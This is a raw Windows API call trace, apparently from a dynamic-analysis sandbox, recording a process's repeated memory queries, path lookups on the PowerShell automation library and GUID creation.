	[0143.588] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.588] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.588] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.589] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.589] VirtualQuery (in: lpAddress=0x14b620, lpBuffer=0x14c4e0, dwLength=0x30 | out: lpBuffer=0x14c4e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.589] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.589] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.590] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.590] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.590] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf8451873, Data2=0xc111, Data3=0x4011, Data4=([0]=0x9d, [1]=0xa3, [2]=0x7f, [3]=0x9c, [4]=0x1, [5]=0x8, [6]=0x6d, [7]=0x51))) returned 0x0
	[0143.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.596] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.596] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.597] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.598] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.598] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.599] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.599] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.599] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.600] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.600] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.600] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.600] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.600] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.601] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.601] VirtualQuery (in: lpAddress=0x14b620, lpBuffer=0x14c4e0, dwLength=0x30 | out: lpBuffer=0x14c4e0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.601] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.602] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.602] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.603] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.603] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb001113e, Data2=0x82a5, Data3=0x4468, Data4=([0]=0xb5, [1]=0x54, [2]=0x6b, [3]=0x92, [4]=0xe4, [5]=0xe3, [6]=0xfc, [7]=0x77))) returned 0x0
	[0143.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.604] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x5626c7ef, Data2=0xf004, Data3=0x4685, Data4=([0]=0x90, [1]=0x8d, [2]=0x70, [3]=0x1a, [4]=0x24, [5]=0x7a, [6]=0xa3, [7]=0x96))) returned 0x0
	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
